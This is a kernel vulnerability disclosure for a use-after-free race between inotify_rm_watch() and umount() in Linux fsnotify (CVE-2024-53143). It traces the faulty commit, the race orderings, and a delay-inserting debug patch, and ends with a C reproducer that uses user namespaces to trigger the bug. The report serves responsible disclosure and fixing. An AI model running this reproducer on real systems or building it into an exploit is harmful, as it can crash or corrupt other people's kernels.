Summary There's a UAF race between inotify_rm_watch() and umount(); my guess is that it is hard to hit (at least when panic_on_oops is enabled) because a more likely race ordering will cause a kernel oops. Hitting it requires root privileges over a mount namespace. I'll send a suggested patch in a bit. I am reporting this as a security bug, but I suspect it is hard to exploit because of the easier-to-hit race ordering that oopses with a poison pointer dereference. Let me know if you would like me to repost the patch on the list for public review. Issue description commit d2f277e26f52 ("fsnotify: rename fsnotify_{get,put}_sb_connectors()") contains the following changes: +static void fsnotify_put_inode_ref(struct inode *inode) +{ + fsnotify_put_sb_watched_objects(inode->i_sb); + iput(inode); +} [...] -static void fsnotify_put_inode_ref(struct inode *inode) -{ - struct super_block *sb = inode->i_sb; - - iput(inode); - if (atomic_long_dec_and_test(&sb->s_fsnotify_connectors)) - wake_up_var(&sb->s_fsnotify_connectors); -} This changes the ordering such that use-after-free can happen when inotify_rm_watch() races with umount(). As background, holding a reference on an inode with iget()/iput() is normally not allowed unless the corresponding superblock is kept alive separately (for example, by holding a reference on a mount of the superblock). Breaking that rule can lead to UAF. fsnotify marks can hold references to inodes because generic_shutdown_super() calls fsnotify_sb_delete(), which is supposed to ensure that fsnotify holds no more inode references before returning. In fsnotify_sb_delete(), the fsnotify_unmount_inodes(sb) removes most fsnotify marks on inodes in the filesystem, but it can skip some elements which are concurrently being removed through other codepaths if the marks are already disconnected from the connector. The wait_var_event(&sb->s_fsnotify_connectors, !atomic_long_read(&sb->s_fsnotify_connectors)) is responsible for reliably waiting for such fsnotify marks to be removed. So in fsnotify_put_inode_ref(), the ordering matters: iput() must happen before the sb->s_fsnotify_connectors count is decremented. After commit d2f277e26f52 (where the decrement happens through fsnotify_put_sb_watched_objects()), the ordering is wrong, and it is possible to crash or hit use-after-free when umount() runs while fsnotify_put_inode_ref() is between fsnotify_put_sb_watched_objects() and iput(). See this possible race ordering (assuming the filesystem is a tmpfs): TASK 1 TASK 2 ====== ====== inotify_rm_watch syscall fsnotify_put_mark fsnotify_drop_object fsnotify_put_inode_ref fsnotify_put_sb_watched_objects [decrement watched_objects] task_work_run __cleanup_mnt cleanup_mnt deactivate_super deactivate_locked_super kill_litter_super kill_anon_super generic_shutdown_super fsnotify_sb_delete [wait for watched_objects==0] shmem_put_super CHECK_DATA_CORRUPTION [no inodes] iput In this case thanks to hardening added in commit 47d586913f2a ("fs: Use CHECK_DATA_CORRUPTION() when kernel bugs are detected"), either we will BUG() at the CHECK_DATA_CORRUPTION() (in CONFIG_BUG_ON_DATA_CORRUPTION=y builds), or we will crash with a VFS_PTR_POISON dereference (because of the poison values written in generic_shutdown_super after the CHECK_DATA_CORRUPTION()). But we can also get use-after-free with a harder-to-hit ordering: TASK 1 TASK 2 ====== ====== inotify_rm_watch syscall fsnotify_put_mark fsnotify_drop_object fsnotify_put_inode_ref fsnotify_put_sb_watched_objects [decrement watched_objects] task_work_run __cleanup_mnt cleanup_mnt deactivate_super deactivate_locked_super kill_litter_super kill_anon_super generic_shutdown_super fsnotify_sb_delete [wait for watched_objects==0] shmem_put_super kfree(sb->s_fs_info) iput iput_final evict shmem_evict_inode [UAF access to sb->s_fs_info] sb->s_fs_info = NULL CHECK_DATA_CORRUPTION [no inodes] Reproducer To reproduce the UAF, you'll have to patch some delays into the kernel: diff --git a/fs/notify/mark.c b/fs/notify/mark.c index c45b222cf9c1..758efc931a0c 100644 --- a/fs/notify/mark.c +++ b/fs/notify/mark.c @@ -70,6 +70,7 @@ #include #include #include +#include #include @@ -151,6 +152,11 @@ static void fsnotify_get_inode_ref(struct inode *inode) static void fsnotify_put_inode_ref(struct inode *inode) { fsnotify_put_sb_watched_objects(inode->i_sb); + if (strcmp(current->comm, "SLOWME") == 0) { + pr_warn("%s: begin delay\n", __func__); + mdelay(2000); + pr_warn("%s: end delay\n", __func__); + } iput(inode); } diff --git a/fs/super.c b/fs/super.c index c9c7223bc2a2..a2789b0a1f6a 100644 --- a/fs/super.c +++ b/fs/super.c @@ -630,7 +630,9 @@ void generic_shutdown_super(struct super_block *sb) * Clean up and evict any inodes that still have references due * to fsnotify or the security policy. */ + pr_warn("%s: calling fsnotify_sb_delete()\n", __func__); fsnotify_sb_delete(sb); + pr_warn("%s: after fsnotify_sb_delete()\n", __func__); security_sb_delete(sb); if (sb->s_dio_done_wq) { diff --git a/mm/shmem.c b/mm/shmem.c index e87f5d6799a7..0c05a68753b6 100644 --- a/mm/shmem.c +++ b/mm/shmem.c @@ -40,6 +40,7 @@ #include #include #include +#include #include "swap.h" static struct vfsmount *shm_mnt __ro_after_init; @@ -4619,6 +4620,7 @@ static void shmem_put_super(struct super_block *sb) percpu_counter_destroy(&sbinfo->used_blocks); mpol_put(sbinfo->mpol); kfree(sbinfo); + mdelay(2000); sb->s_fs_info = NULL; } With that, the following reproducer should trigger UAF: #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1) \ err(1, "SYSCHK(" #x ")"); \ __res; \ }) static void write_file(char *name, char *buf) { int fd = SYSCHK(open(name, O_WRONLY)); if (write(fd, buf, strlen(buf)) != strlen(buf)) err(1, "write %s", name); close(fd); } static void write_map(char *name, int outer_id) { char buf[100]; sprintf(buf, "0 %d 1", outer_id); write_file(name, buf); } static void *thread_fn(void *dummy) { sleep(1); SYSCHK(umount("/tmp")); return NULL; } int main(void) { // boilerplate start code sync(); setbuf(stdout, NULL); setbuf(stderr, NULL); // set up user namespace (for unprivileged access to mount()) int outer_uid = getuid(); int outer_gid = getgid(); SYSCHK(unshare(CLONE_NEWUSER|CLONE_NEWNS)); SYSCHK(mount(NULL, "/", NULL, MS_PRIVATE|MS_REC, NULL)); write_file("/proc/self/setgroups", "deny"); write_map("/proc/self/uid_map", outer_uid); write_map("/proc/self/gid_map", outer_gid); SYSCHK(mount("blah", "/tmp", "tmpfs", MS_NOSUID|MS_NODEV, "")); SYSCHK(close(SYSCHK(open("/tmp/aaa", O_RDWR|O_CREAT, 0700)))); int fd = SYSCHK(inotify_init()); int wd = SYSCHK(inotify_add_watch(fd, "/tmp/aaa", IN_MODIFY)); pthread_t thread; if (pthread_create(&thread, NULL, thread_fn, NULL)) errx(1, "pthread_create"); SYSCHK(prctl(PR_SET_NAME, "SLOWME")); SYSCHK(inotify_rm_watch(fd, wd)); pthread_join(thread, NULL); } Disclosure deadline This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2025-02-17. For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html Related CVE Number: CVE-2024-53143. Credit: Jann Horn